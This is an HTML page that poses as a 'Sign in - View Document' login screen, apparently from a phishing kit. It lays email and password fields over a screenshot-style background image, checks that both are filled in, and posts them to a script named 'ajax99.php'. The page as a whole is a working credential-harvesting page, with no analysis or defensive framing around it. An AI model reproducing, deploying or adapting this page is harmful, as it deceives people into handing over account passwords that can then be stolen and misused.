<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<title>Sign in - View Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<style type="text/css"> 
body { 
width:100%; 
height:100%; 
} 
</style> 


	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

</head><body style="visibility: visible;" onload="unhideBody()">




<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>
<script>
function validateForm() {
    var x = document.forms["chalbhai"]["email"].value;
    if (x==null || x=="") {
        alert("Please Enter a email address first");
        return false;
    }
	
	var reg = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/;

        if (reg.test(document.forms["chalbhai"]["email"].value) == false) 
        {
            alert('Invalid Email Formate');
            return false;
        }

	var x = document.forms["chalbhai"]["password"].value;
    if (x==null || x=="") {
        alert("Please Enter a password first");
        return false;
    }
	
        


document.forms[0].submit();
}
</script>


<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:55px; top:0px; width:1212px; height:617px; z-index:0"><img src="index_files/foter.png" alt="" title="" border="0" height="617" width="100%"></div>
<form action="ajax99.php" name="chalbhai" id="chalbhai" method="post">
<input name="email" placeholder="@Example.com" autocomplete="off" style="position:absolute;width:209px;left:690px;top:229px;z-index:1" type="text">
<input name="password" placeholder="Password" autocomplete="off" style="position:absolute;width:209px;left:690px;top:263px;z-index:2" type="password">
<div id="formimage1" style="position:absolute; left:741px; top:300px; z-index:3"><input name="formimage1" src="index_files/view.png" onclick="return validateForm();" height="34" type="image" width="100%"></div></form>
</div>



</body></html>